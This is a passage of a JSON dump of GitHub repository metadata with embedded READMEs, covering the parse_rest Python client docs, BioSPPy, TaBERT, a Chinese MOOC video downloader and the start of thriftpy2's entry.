objects\n[, , ]\n~~~~~\n\nTherefore, one way to tell which objects saved successfully after a batch save operation\nis to check which objects have `objectId` set.\n\nQuerying\n--------\n\nAny class inheriting from `parse_rest.Object` has a `Query`\nobject. With it, you can perform queries that return a set of objects\nor that will return a object directly.\n\n\n### Retrieving a single object\n\nTo retrieve an object with a Parse class of `GameScore` and an\n`objectId` of `xxwXx9eOec`, run:\n\n~~~~~ {python}\ngameScore = GameScore.Query.get(objectId=\"xxwXx9eOec\")\n~~~~~\n\n### Working with Querysets\n\nTo query for sets of objects, we work with the concept of\n`Queryset`s. If you are familiar with Django you will be right at home\n\\- but be aware that is not a complete implementation of their\nQueryset or Database backend.\n\nThe Query object contains a method called `all()`, which will return a\nbasic (unfiltered) Queryset. It will represent the set of all objects\nof the class you are querying.\n\n~~~~~ {python}\nall_scores = GameScore.Query.all()\n~~~~~\n\nQuerysets are _lazily evaluated_, meaning that it will only actually\nmake a request to Parse when you either call a method that needs to\noperate on the data, or when you iterate on the Queryset.\n\n#### Filtering\n\nLike Django, Querysets can have constraints added by appending the name of the filter operator to name of the attribute:\n\n~~~~~ {python}\nhigh_scores = GameScore.Query.filter(score__gte=1000)\n~~~~~\n\nYou can similarly perform queries on GeoPoint objects by using the `nearSphere` operator:\n\n~~~~~ {python}\nmy_loc = GeoPoint(latitude=12.0, longitude=-34.55)\nnearby_restaurants = Restaurant.Query.filter(location__nearSphere=my_loc)\n~~~~~\n\nYou can see the [full list of constraint operators defined by\nParse](http://docs.parseplatform.org/rest/guide/#query-constraints)\n\n\n#### Sorting/Ordering\n\nQuerysets can also be ordered. Just define the name of the attribute\nthat you want to use to sort. 
Appending a \"-\" in front of the name\nwill sort the set in descending order.\n\n~~~~~ {python}\nlow_to_high_score_board = GameScore.Query.all().order_by(\"score\")\nhigh_to_low_score_board = GameScore.Query.all().order_by(\"-score\") # or order_by(\"score\", descending=True)\n~~~~~\n\n#### Limit/Skip\n\nIf you don't want the whole set, you can apply the\nlimit and skip function. Let's say you have a have classes\nrepresenting a blog, and you want to implement basic pagination:\n\n~~~~~ {python}\nposts = Post.Query.all().order_by(\"-publication_date\")\npage_one = posts.limit(10) # Will return the most 10 recent posts.\npage_two = posts.skip(10).limit(10) # Will return posts 11-20\n~~~~~\n\n#### Related objects\n\nYou can specify \"join\" attributes to get related object with single query.\n\n~~~~~ {python}\nposts = Post.Query.all().select_related(\"author\", \"editor\")\n~~~~~\n\n#### Composability/Chaining of Querysets\n\nThe example above can show the most powerful aspect of Querysets, that\nis the ability to make complex querying and filtering by chaining calls:\n\nMost importantly, Querysets can be chained together. This allows you\nto make more complex queries:\n\n~~~~~ {python}\nposts_by_joe = Post.Query.all().filter(author='Joe').order_by(\"view_count\")\npopular_posts = posts_by_joe.gte(view_count=200)\n~~~~~\n\n#### Iterating on Querysets\n\nAfter all the querying/filtering/sorting, you will probably want to do\nsomething with the results. Querysets can be iterated on:\n\n~~~~~ {python}\nposts_by_joe = Post.Query.all().filter(author='Joe').order_by('view_count')\nfor post in posts_by_joe:\n print post.title, post.publication_date, post.text\n~~~~~\n\n**TODO**: Slicing of Querysets\n\n\nRelations\n---------\n\nA Relation is field that contains references to multiple objects.\nYou can query this subset of objects.\n\n(Note that Parse's relations are \"one sided\" and don't involve a join table. [See the docs.](http://docs.parseplatform.org/js/guide/#many-to-many))\n\nFor example, if we have Game and GameScore classes, and one game\ncan have multiple GameScores, you can use relations to associate\nthose GameScores with a Game.\n\n~~~~~ {python}\ngame = Game(name=\"3-way Battle\")\ngame.save()\nscore1 = GameScore(player_name='Ronald', score=100)\nscore2 = GameScore(player_name='Rebecca', score=140)\nscore3 = GameScore(player_name='Sara', score=190)\nrelation = game.relation('scores')\nrelation.add([score1, score2, score3])\n~~~~~\n\nA Game gets added, three GameScores get added, and three relations\nare created associating the GameScores with the Game.\n\nTo retreive the related scores for a game, you use query() to get a\nQueryset for the relation.\n\n~~~~~ {python}\nscores = relation.query()\nfor gamescore in scores:\n print gamescore.player_name, gamescore.score\n~~~~~\n\nThe query is limited to the objects previously added to the\nrelation.\n\n~~~~~ {python}\nscores = relation.query().order_by('score', descending=True)\nfor gamescore in scores:\n print gamescore.player_name, gamescore.score\n~~~~~\n\nTo remove objects from a relation, you use remove(). This example\nremoves all the related objects.\n\n~~~~~ {python}\nscores = relation.query()\nfor gamescore in scores:\n relation.remove(gamescore)\n~~~~~\n\n\nUsers\n-----\n\nYou can sign up, log in, modify or delete users as well, using the `parse_rest.user.User` class. 
You sign a user up as follows:\n\n~~~~~ {python}\nfrom parse_rest.user import User\n\nu = User.signup(\"dhelmet\", \"12345\", phone=\"555-555-5555\")\n~~~~~\n\nor log in an existing user with\n\n~~~~~ {python}\nu = User.login(\"dhelmet\", \"12345\")\n~~~~~\n\nYou can also request a password reset for a specific user with\n\n~~~~~ {python}\nUser.request_password_reset(email=\"dhelmet@gmail.com\")\n~~~~~\n\nIf you'd like to log in a user with Facebook or Twitter, and have already obtained an access token (including a user ID and expiration date) to do so, you can log in like this:\n\n~~~~ {python}\nauthData = {\"facebook\": {\"id\": fbID, \"access_token\": access_token,\n \"expiration_date\": expiration_date}}\nu = User.login_auth(authData)\n~~~~\n\nOnce a `User` has been logged in, it saves its session so that it can be edited or deleted:\n\n~~~~~ {python}\nu.highscore = 300\nu.save()\nu.delete()\n~~~~~\n\nTo get the current user from a Parse session:\n\n~~~~~ {python}\nfrom parse_rest.connection import SessionToken, register\n\n# Acquire a valid parse session somewhere\n# Example: token = request.session.get('session_token')\n\n# Method 1: Using a `with` statement\n# Do this to isolate use of session token in this block only\nwith SessionToken(token):\n me = User.current_user()\n\n# Method 2: register your parse connection with `session_token` parameter\n# Do this to use the session token for all subsequent queries\nregister(PARSE_APPID, PARSE_APIKEY, session_token=token)\nme = User.current_user()\n~~~~~\n\n\nPush\n---------------\n\nYou can also send notifications to your users using [Parse's Push functionality](http://docs.parseplatform.org/rest/guide/#push-notifications), through the Push object:\n\n~~~~~ {python}\nfrom parse_rest.installation import Push\n\nPush.message(\"The Giants won against the Mets 2-3.\",\n channels=[\"Giants\", \"Mets\"])\n~~~~~\n\nThis will push a message to all users subscribed to the \"Giants\" and \"Mets\" channels. Your alert can be restricted based on [Advanced Targeting](http://docs.parseplatform.org/rest/guide/#sending-pushes-to-queries) by specifying the `where` argument:\n\n~~~~~ {python}\nPush.message(\"Willie Hayes injured by own pop fly.\",\n channels=[\"Giants\"], where={\"injuryReports\": True})\n\nPush.message(\"Giants scored against the A's! It's now 2-2.\",\n channels=[\"Giants\"], where={\"scores\": True})\n~~~~~\n\nIf you wish to include more than a simple message in your notification, such as incrementing the app badge in iOS or adding a title in Android, use the `alert` method and pass the actions in a dictionary:\n\n~~~~~ {python}\nPush.alert({\"alert\": \"The Mets scored! The game is now tied 1-1.\",\n \"badge\": \"Increment\", \"title\": \"Mets Score\"}, channels=[\"Mets\"],\n where={\"scores\": True})\n~~~~~\n\n\nCloud Functions\n---------------\n\nParse offers [CloudCode](http://docs.parseplatform.org/rest/guide/#cloud-code), which has the ability to upload JavaScript functions that will be run on the server. You can use the `parse_rest` client to call those functions.\n\nThe CloudCode guide describes how to upload a function to the server. 
Let's say you upload the following `main.js` script:\n\n~~~~~ {javascript}\nParse.Cloud.define(\"hello\", function(request, response) {\n response.success(\"Hello world!\");\n});\n\n\nParse.Cloud.define(\"averageStars\", function(request, response) {\n var query = new Parse.Query(\"Review\");\n query.equalTo(\"movie\", request.params.movie);\n query.find({\n success: function(results) {\n var sum = 0;\n for (var i = 0; i < results.length; ++i) {\n sum += results[i].get(\"stars\");\n }\n response.success(sum / results.length);\n },\n error: function() {\n response.error(\"movie lookup failed\");\n }\n });\n});\n~~~~~\n\nThen you can call either of these functions using the `parse_rest.datatypes.Function` class:\n\n~~~~~ {python}\nfrom parse_rest.datatypes import Function\n\nhello_func = Function(\"hello\")\nhello_func()\n{u'result': u'Hello world!'}\nstar_func = Function(\"averageStars\")\nstar_func(movie=\"The Matrix\")\n{u'result': 4.5}\n~~~~~\n\n\nACLs\n---------------\nThe ACL for an object can be updated using the `parse_rest.datatypes.ACL` class. This class provides three methods for setting an ACL: set_user, set_role, and set_default. For example, using the User and gameScore examples from above:\n~~~~~ {python}\nfrom parse_rest.datatypes import ACL\nfrom parse_rest.user import User\n\nu = User.login('dhelmet', '12345')\n\ngameScore.ACL.set_user(u, read=True, write=True)\n# allows user 'dhelmet' to read and write to gameScore\ngameScore.ACL.set_default(read=True)\n# allows public to read but not write to gameScore\ngameScore.ACL.set_role('moderators', read=True, write=True)\n# allows role 'moderators' to read and write to gameScore. Can alternatively pass the role object instead of the\n# role name. See below for more info on Roles.\ngameScore.save()\n~~~~~\n\n\nRoles\n---------------\nYou can create, update or delete roles as well, using the `parse_rest.role.Role` class. Creating a role requires you to pass a name and an ACL to Role.\n~~~~~ {python}\nfrom parse_rest.role import Role\nfrom parse_rest.datatypes import ACL\n\nadmin_role = Role(name='moderators')\nadmin_role.ACL.set_default(read=True)\nadmin_role.save()\n~~~~~\n\nThis, for example, creates a role with the name 'moderators', with an ACL that allows the public to read but not write to this role object.\n\n\nSession Tokens\n---------------\nWhen querying or updating an object protected by an ACL, parse.com requires the session token of the user with read and write privileges, respectively. 
You can pass the session token to such queries and updates by using the `parse_rest.connection.SessionToken` class.\n\n~~~~~ {python}\nfrom parse_rest.connection import SessionToken\nfrom parse_rest.user import User\n\nu = User.login('dhelmet', '12345')\ntoken = u.sessionToken\n\nwith SessionToken(token):\n collectedItem = CollectedItem.Query.get(type=\"Sword\") # Get a collected item, Sword, that is protected by ACL\n print collectedItem\n \nu.logout()\n~~~~~\n\nAssuming the CollectedItem 'Sword' is read-protected from the public by an ACL and is readable only by the user, SessionToken allows the user to bypass the ACL and get the 'Sword' item.\n\nElevating Access to Master\n--------------------------\nSometimes it is useful to only allow privileged use of the master key for specific uses.\n\n~~~~~ {python}\nfrom parse_rest.connection import MasterKey\n\nwith MasterKey('master key'):\n # do privileged calls\n~~~~~\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PIA-Group/BioSPPy", "link": "https://github.com/PIA-Group/BioSPPy", "tags": ["python", "physiological-computing", "biosignals", "data-science", "signal-processing"], "stars": 516, "description": "Biosignal Processing in Python", "lang": "Python", "repo_lang": "", "readme": "> This repository is archived. The BioSPPy toolbox is now maintained at [scientisst/BioSPPy](https://github.com/scientisst/BioSPPy).\n\n# BioSPPy - Biosignal Processing in Python\n\n*A toolbox for biosignal processing written in Python.*\n\n[![Image](https://github.com/PIA-Group/BioSPPy/raw/master/docs/logo/logo_400.png \"I know you're listening! - xkcd.com/525\")](http://biosppy.readthedocs.org/)\n\nThe toolbox bundles together various signal processing and pattern recognition\nmethods geared towards the analysis of biosignals.\n\nHighlights:\n\n- Support for various biosignals: BVP, ECG, EDA, EEG, EMG, PCG, PPG, Respiration\n- Signal analysis primitives: filtering, frequency analysis\n- Clustering\n- Biometrics\n\nDocumentation can be found at: \n\n## Installation\n\nInstallation can be easily done with `pip`:\n\n```bash\n$ pip install biosppy\n```\n\n## Simple Example\n\nThe code below loads an ECG signal from the `examples` folder, filters it,\nperforms R-peak detection, and computes the instantaneous heart rate.\n\n```python\nfrom biosppy import storage\nfrom biosppy.signals import ecg\n\n# load raw ECG signal\nsignal, mdata = storage.load_txt('./examples/ecg.txt')\n\n# process it and plot\nout = ecg.ecg(signal=signal, sampling_rate=1000., show=True)\n```\n\nThis should produce a plot similar to the one below.\n\n[![Image](https://github.com/PIA-Group/BioSPPy/raw/master/docs/images/ECG_summary.png \"ECG Summary Plot\")]()\n\n## Dependencies\n\n- bidict\n- h5py\n- matplotlib\n- numpy\n- scikit-learn\n- scipy\n- shortuuid\n- six\n- joblib\n\n## Citing\nPlease use the following if you need to cite BioSPPy:\n\n- Carreiras C, Alves AP, Louren\u00e7o A, Canento F, Silva H, Fred A, *et al.*\n **BioSPPy - Biosignal Processing in Python**, 2015-,\n https://github.com/PIA-Group/BioSPPy/ [Online; accessed ```--```].\n\n```latex\n@Misc{,\n author = {Carlos Carreiras and Ana Priscila Alves and Andr\\'{e} Louren\\c{c}o and Filipe Canento and Hugo Silva and Ana Fred and others},\n title = {{BioSPPy}: Biosignal Processing in {Python}},\n year = {2015--},\n url = \"https://github.com/PIA-Group/BioSPPy/\",\n note = {[Online; accessed ]}\n}\n```\n\n## License\n\nBioSPPy is released under the BSD 
3-clause license. See LICENSE for more details.\n\n## Disclaimer\n\nThis program is distributed in the hope it will be useful and provided\nto you \"as is\", but WITHOUT ANY WARRANTY, without even the implied\nwarranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. This\nprogram is NOT intended for medical diagnosis. We expressly disclaim any\nliability whatsoever for any direct, indirect, consequential, incidental\nor special damages, including, without limitation, lost revenues, lost\nprofits, losses resulting from business interruption or loss of data,\nregardless of the form of action or legal theory under which the\nliability may be asserted, even if advised of the possibility of such\ndamages.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalbazaar/pyld", "link": "https://github.com/digitalbazaar/pyld", "tags": ["json-ld", "semantic-web", "linked-data", "rdf", "python"], "stars": 516, "description": "JSON-LD processor written in Python", "lang": "Python", "repo_lang": "", "readme": "README.rst", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/TaBERT", "link": "https://github.com/facebookresearch/TaBERT", "tags": [], "stars": 515, "description": "This repository contains source code for the TaBERT model, a pre-trained language model for learning joint representations of natural language utterances and (semi-)structured tables for semantic parsing. TaBERT is pre-trained on a massive corpus of 26M Web tables and their associated natural language context, and could be used as a drop-in replacement of a semantic parsers original encoder to compute representations for utterances and table schemas (columns).", "lang": "Python", "repo_lang": "", "readme": "# TaBERT: Learning Contextual Representations for Natural Language Utterances and Structured Tables\n\nThis repository contains source code for the [`TaBERT` model](https://arxiv.org/abs/2005.08314), a pre-trained language model for learning joint representations of natural language utterances and (semi-)structured tables for semantic parsing. `TaBERT` is pre-trained on a massive corpus of 26M Web tables and their associated natural language context, and could be used as a drop-in replacement of a semantic parsers original encoder to compute representations for utterances and table schemas (columns).\n\n## Installation\n\nFirst, install the conda environment `tabert` with supporting libraries.\n\n```bash\nbash scripts/setup_env.sh\n```\n\nOnce the conda environment is created, install `TaBERT` using the following command:\n\n```bash\nconda activate tabert\npip install --editable .\n```\n\n**Integration with HuggingFace's pytorch-transformers Library** is still WIP. While all the pre-trained models were developed based on the old version of the library `pytorch-pretrained-bert`, they are compatible with the the latest version `transformers`. The conda environment will install both versions of the transformers library, and `TaBERT` will use `pytorch-pretrained-bert` by default. 
You could uninstall the `pytorch-pretrained-bert` library if you prefer using `TaBERT` with the latest version of `transformers`.\n\n## Pre-trained Models\n\nPre-trained models could be downloaded from this [Google Drive shared folder](https://drive.google.com/drive/folders/1fDW9rLssgDAv19OMcFGgFJ5iyd9p7flg?usp=sharing).\nPlease uncompress the tarball files before usage.\n\nPre-trained models could be downloaded from command line as follows:\n```shell script\npip install gdown\n\n# TaBERT_Base_(k=1)\ngdown 'https://drive.google.com/uc?id=1-pdtksj9RzC4yEqdrJQaZu4-dIEXZbM9'\n\n# TaBERT_Base_(K=3)\ngdown 'https://drive.google.com/uc?id=1NPxbGhwJF1uU9EC18YFsEZYE-IQR7ZLj'\n\n# TaBERT_Large_(k=1)\ngdown 'https://drive.google.com/uc?id=1eLJFUWnrJRo6QpROYWKXlbSOjRDDZ3yZ'\n\n# TaBERT_Large_(K=3)\ngdown 'https://drive.google.com/uc?id=17NTNIqxqYexAzaH_TgEfK42-KmjIRC-g'\n```\n\n## Using a Pre-trained Model\n\nTo load a pre-trained model from a checkpoint file:\n\n```python\nfrom table_bert import TableBertModel\n\nmodel = TableBertModel.from_pretrained(\n 'path/to/pretrained/model/checkpoint.bin',\n)\n```\n\nTo produce representations of natural language text and and its associated table:\n```python\nfrom table_bert import Table, Column\n\ntable = Table(\n id='List of countries by GDP (PPP)',\n header=[\n Column('Nation', 'text', sample_value='United States'),\n Column('Gross Domestic Product', 'real', sample_value='21,439,453')\n ],\n data=[\n ['United States', '21,439,453'],\n ['China', '27,308,857'],\n ['European Union', '22,774,165'],\n ]\n).tokenize(model.tokenizer)\n\n# To visualize table in an IPython notebook:\n# display(table.to_data_frame(), detokenize=True)\n\ncontext = 'show me countries ranked by GDP'\n\n# model takes batched, tokenized inputs\ncontext_encoding, column_encoding, info_dict = model.encode(\n contexts=[model.tokenizer.tokenize(context)],\n tables=[table]\n)\n```\n\nFor the returned tuple, `context_encoding` and `column_encoding` are PyTorch tensors \nrepresenting utterances and table columns, respectively. `info_dict` contains useful \nmeta information (e.g., context/table masks, the original input tensors to BERT) for \ndownstream application.\n\n```python\ncontext_encoding.shape\n>>> torch.Size([1, 7, 768])\n\ncolumn_encoding.shape\n>>> torch.Size([1, 2, 768])\n```\n\n**Use Vanilla BERT** To initialize a TaBERT model from the parameters of BERT:\n\n```python\nfrom table_bert import TableBertModel\n\nmodel = TableBertModel.from_pretrained('bert-base-uncased')\n```\n\n## Example Applications\n\nTaBERT could be used as a general-purpose representation learning layer for semantic parsing tasks over database tables. \nExample applications could be found under the `examples` folder.\n\n## Extract/Preprocess Table Corpora from CommonCrawl and Wikipedia\n\n### Prerequisite\n\nThe following libraries are used for data extraction:\n\n* [`jnius`](https://pyjnius.readthedocs.io/en/stable/)\n* [`info.bliki.wiki`](https://bitbucket.org/axelclk/info.bliki.wiki/wiki/Mediawiki2HTML)\n* wikitextparser\n* Beautiful Soup 4\n* Java Wikipedia code located at `contrib/wiki_extractor`\n * It compiles to a `.jar` file using maven, which is also included in the folder\n* `jdk` 12+\n\n### Installation\nFist, you need to install Java JDK. \nThen use the following command to install necessary Python libraries. 
\n\n```\npip install -r preprocess/requirements.txt\npython -m spacy download en_core_web_sm\n```\n\n### Training Table Corpora Extraction\n\n#### CommonCrawl WDC Web Table Corpus 2015\n\nDetails of the dataset could be found at [here](http://webdatacommons.org/webtables/2015/downloadInstructions.html).\nWe used the English relational tables split, which could be downloaded at [here](http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/englishCorpus/compressed/).\n\nThe script to preprocess the data is at `scripts/preprocess_commoncrawl_tables.sh`.\nThe following command pre-processes [a sample](http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/sample.gz) \nof the whole WDC dataset. To preprocess the whole dataset, simply replace \nthe `input_file` with the root folder of the downloaded tar ball files.\n```shell script\nmkdir -p data/datasets\nwget http://data.dws.informatik.uni-mannheim.de/webtables/2015-07/sample.gz -P data/datasets\ngzip -d < data/datasets/sample.gz > data/datasets/commoncrawl.sample.jsonl\n\npython \\\n -m preprocess.common_crawl \\\n --worker_num 12 \\\n --input_file data/datasets/commoncrawl.sample.jsonl \\\n --output_file data/preprocessed_data/common_crawl.preprocessed.jsonl\n```\n\n#### Wikipedia Tables\n\nThe script to extract Wiki tables is at `scripts/extract_wiki_tables.sh`. It demonstrates\nextracting tables from a sampled Wikipedia dump. Again, you may need the full Wikipedida dump\nto perform data extraction.\n\n### Notes for Table Extraction\n\n**Extract Tables from Scraped HTML Pages** \nMost code in `preprocess.extract_wiki_data` is for extracting surrounding \nnatural language sentences around tables. If you are only interested in \nextracting tables (e.g., from scraped Wiki Web pages), you could just use \nthe `extract_table_from_html` function. See the comments for more details. \n\n## Training Data Generation\n\nThis section documents how to generate training data for masked language modeling training \nfrom extracted and preprocessed tables. \n\nThe scripts to generate training data for our vanilla `TaBERT(K=1)` and vertical attention\n`TaBERT(k=3)` models are `utils/generate_vanilla_tabert_training_data.py` and \n`utils/generate_vertical_tabert_training_data.py`. They are heavily optimized for generating \ndata in parallel in a distributed compute environment, but could still be used locally. 
\n\nThe following script assumes you have concatenated\nthe `.jsonl` files obtained from running the data extraction scripts on Wikipedia and CommonCrawl\ncorpora and saved to `data/preprocessed_data/tables.jsonl`\n\n```shell script\ncd data/preprocessed_data\ncat common_crawl.preprocessed.jsonl wiki_tables.jsonl > tables.jsonl\n```\n\nThe following script generates training data for a vanilla `TaBERT(K=1)` model:\n```shell script\noutput_dir=data/train_data/vanilla_tabert\nmkdir -p ${output_dir}\n\npython -m utils.generate_vanilla_tabert_training_data \\\n --output_dir ${output_dir} \\\n --train_corpus data/preprocessed_data/tables.jsonl \\\n --base_model_name bert-base-uncased \\\n --do_lower_case \\\n --epochs_to_generate 15 \\\n --max_context_len 128 \\\n --table_mask_strategy column \\\n --context_sample_strategy concate_and_enumerate \\\n --masked_column_prob 0.2 \\\n --masked_context_prob 0.15 \\\n --max_predictions_per_seq 200 \\\n --cell_input_template 'column|type|value' \\\n --column_delimiter \"[SEP]\"\n```\n\nThe following script generates training data for a `TaBERT(K=3)` model with \nvertical self-attention:\n```shell script\noutput_dir=data/train_data/vertical_tabert\nmkdir -p ${output_dir}\n\npython -m utils.generate_vertical_tabert_training_data \\\n --output_dir ${output_dir} \\\n --train_corpus data/preprocessed_data/tables.jsonl \\\n --base_model_name bert-base-uncased \\\n --do_lower_case \\\n --epochs_to_generate 15 \\\n --max_context_len 128 \\\n --table_mask_strategy column \\\n --context_sample_strategy concate_and_enumerate \\\n --masked_column_prob 0.2 \\\n --masked_context_prob 0.15 \\\n --max_predictions_per_seq 200 \\\n --cell_input_template 'column|type|value' \\\n --column_delimiter \"[SEP]\"\n```\n\n**Parallel Data Generation** The script has two additional arguments, `--global_rank` and \n`--world_size`. To generate training data in parallel using `N` processes, just fire up \n`N` processes with the same set of arguments and `--world_size=N`. The argument `--global_rank` \nis set to `[1, 2, ..., N]` for each process.\n\n## Model Training\nOur models are trained on a cluster of 32GB Tesla V100 GPUs. 
The following script demonstrates \ntraining a vanilla `TaBERT(k=1)` model using a single GPU with gradient accumulation:\n```shell script\nmkdir -p data/runs/vanilla_tabert\n\npython train.py \\\n --task vanilla \\\n --data-dir data/train_data/vanilla_tabert \\\n --output-dir data/runs/vanilla_tabert \\\n --table-bert-extra-config '{}' \\\n --train-batch-size 8 \\\n --gradient-accumulation-steps 32 \\\n --learning-rate 2e-5 \\\n --max-epoch 10 \\\n --adam-eps 1e-08 \\\n --weight-decay 0.0 \\\n --fp16 \\\n --clip-norm 1.0 \\\n --empty-cache-freq 128\n```\n\nThe following script shows training a `TaBERT(k=3)` model with vertical self-attention:\n```shell script\nmkdir -p data/runs/vertical_tabert\n\npython train.py \\\n --task vertical_attention \\\n --data-dir data/train_data/vertical_tabert \\\n --output-dir data/runs/vertical_tabert \\\n --table-bert-extra-config '{\"base_model_name\": \"bert-base-uncased\", \"num_vertical_attention_heads\": 6, \"num_vertical_layers\": 3, \"predict_cell_tokens\": true}' \\\n --train-batch-size 8 \\\n --gradient-accumulation-steps 64 \\\n --learning-rate 4e-5 \\\n --max-epoch 10 \\\n --adam-eps 1e-08 \\\n --weight-decay 0.01 \\\n --fp16 \\\n --clip-norm 1.0 \\\n --empty-cache-freq 128\n```\n\nDistributed training with multiple GPUs is similar to [XLM](https://github.com/facebookresearch/XLM).\n\n## Reference\n\nIf you plan to use `TaBERT` in your project, please consider citing [our paper](https://arxiv.org/abs/2005.08314):\n```\n@inproceedings{yin20acl,\n title = {Ta{BERT}: Pretraining for Joint Understanding of Textual and Tabular Data},\n author = {Pengcheng Yin and Graham Neubig and Wen-tau Yih and Sebastian Riedel},\n booktitle = {Annual Conference of the Association for Computational Linguistics (ACL)},\n month = {July},\n year = {2020}\n}\n```\n\n## License\n\nTaBERT is CC-BY-NC 4.0 licensed as of now.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "renever/cn_mooc_dl", "link": "https://github.com/renever/cn_mooc_dl", "tags": [], "stars": 515, "description": "\u4e2d\u56fd\u5927\u5b66MOOC\uff0c\u5b66\u5802\u5728\u7ebf\uff0c\u7f51\u6613\u4e91\u8bfe\u5802\uff0c\u4e0b\u8f7d", "lang": "Python", "repo_lang": "", "readme": "cn_mooc_dl\n==========\n\n1. \u4e2d\u56fd\u5927\u5b66 MOOC\uff08`icourse163.org`\uff09\u89c6\u9891\u4e0b\u8f7d\n2. \u6e05\u534e\u5b66\u5802\u5728\u7ebf\uff08`xuetangx.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n3. \u7f51\u6613\u4e91\u8bfe\u5802\uff08`study.163.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n4. 
\u7f51\u6613\u4e91\u8bfe\u5802\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\uff08`mooc.study.163.com`\uff09\u89c6\u9891\u4e0b\u8f7d\n\n####\u6d4b\u8bd5\u73af\u5883\uff1a `PYTHON 2.7\uff1b WIN 7`\n####\u4f9d\u8d56\u5305\uff1a `requests\uff0c beautifulsoup4`\n\tpip install requests\n\tpip install beautifulsoup4\n\u6216\u8005\u5728\u4ee3\u7801\u76ee\u5f55\u4e0b\n\t\n\tpip install -r requirements.txt \n\n\n####\u4e2d\u56fd\u5927\u5b66 MOOC\uff08`icourse163.org`\uff09\uff1a\n python icourse163_dl.py -u -p \"url\"\n\n* \u5176\u4e2d url \u662f\u6253\u5f00\u8bfe\u7a0b\u9875\u9762\u540e\uff0c\u6d4f\u89c8\u5668\u5730\u5740\u680f\u2018#\u2019\u4e4b\u524d\u90e8\u5206\u3002\n\u4ee5\u201c\u56fd\u9632\u79d1\u5927\u9ad8\u7b49\u6570\u5b66\uff08\u4e00\uff09\u201d\u4e3a\u4f8b\uff0c\u6253\u5f00\u8bfe\u7a0b\u540e\u6d4f\u89c8\u5668\u5730\u5740\u680f\u663e\u793a\u4e3a\uff1a\n`http://www.icourse163.org/learn/nudt-9004#/learn/announce`\n\u5219 url \u4e3a `http://www.icourse163.org/learn/nudt-9004`\n* \u7f51\u6613\u6d41\u91cf\u65f6\u5feb\u65f6\u6162\uff0c\u65f6\u6709\u65f6\u65e0\u3002\u53ef\u4ee5\u8fd0\u884c\u4e24\u904d\uff0c\u4e4b\u524d\u6ca1\u4e0b\u5b8c\u7684\u53ef\u65ad\u7ebf\u7eed\u4f20\u3002\n\n####\u6e05\u534e\u5b66\u5802\u5728\u7ebf\uff08`xuetangx.com`\uff09\uff1a \n python xuetangx_dl.py -u -p \"url\"\n \n* \u5176\u4e2d url \u662f\u8bfe\u7a0b\u8bfe\u4ef6\u9875\u9762\u7684\u6d4f\u89c8\u5668\u5730\u5740\uff0c\u6bd4\u5982\uff1a\n`http://www.xuetangx.com/courses/HITx/GO90300700/2014_T2/courseware/`\n\n####\u7f51\u6613\u4e91\u8bfe\u5802\uff08`study.163.com`\uff09\uff1a\n python study163_dl.py \"url\"\n* \u4e91\u8bfe\u5802\u65b0\u589e\u4e13\u680f\u201c\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\u201d\u90a3\u4e00\u90e8\u5206\uff08mooc.study.163.com\uff09\u6709\u70b9\u7279\u6b8a\uff0c\u5177\u4f53\u770b\u4e0b\u9762\u3002\n* \u6536\u8d39\u8bfe\u7a0b\u4e0b\u4e0d\u4e86\u3002\n* \u7f51\u6613\u4e91\u8bfe\u5802\u4e0d\u5fc5\u767b\u5f55\u3002\u5176\u4e2d url \u662f\u8bfe\u7a0b\u5217\u8868\u9875\u9762\u6d4f\u89c8\u5668\u5730\u5740\uff0c\u6bd4\u5982:\n`http://study.163.com/course/introduction/334013.htm`\n* \u4e0d\u80fd\u7eed\u4f20\u3002\n\n \n####\u4e91\u8bfe\u5802\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\uff08`mooc.study.163.com`\uff09\uff1a \n python icourse163_dl.py -u -p \"url\" \n* \u4e91\u8bfe\u5802\u65b0\u589e\u4e13\u680f\u201c\u8ba1\u7b97\u673a\u4e13\u4e1a\u8bfe\u7a0b\u201d\uff0c\u867d\u7136\u6302\u5728\u4e91\u8bfe\u5802\u9875\u9762\u4e0a\uff0c\u4f46\u662f\u91cc\u9762\u7684\u7ed3\u6784\u662f\u548c\u201c\u4e2d\u56fd\u5927\u5b66 MOOC\u201d\u4e00\u6837\u7684\u3002\u6240\u4ee5\u8981\u7528 `icourse163_dl.py` \u6765\u4e0b\u8f7d\u3002\n* \u5176\u4e2d url \u7c7b\u4f3c\u8fd9\u6837\uff1a `http://mooc.study.163.com/learn/ZJU-1000002014`\n\n\n#####--path \u7528\u4e8e\u6307\u5b9a\u4fdd\u5b58\u6587\u4ef6\u5939\uff0c --overwrite \u6307\u5b9a\u662f\u5426\u8986\u76d6\n\n\nmatthieu.lin@gmail.com", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Thriftpy/thriftpy2", "link": "https://github.com/Thriftpy/thriftpy2", "tags": ["thrift", "thriftpy", "python", "rpc"], "stars": 515, "description": "Pure python approach of Apache Thrift. ", "lang": "Python", "repo_lang": "", "readme": "============\nThriftPy2\n============\n\n.. image:: https://travis-ci.com/Thriftpy/thriftpy2.svg?branch=develop\n :target: https://travis-ci.com/Thriftpy/thriftpy2\n\n.. 
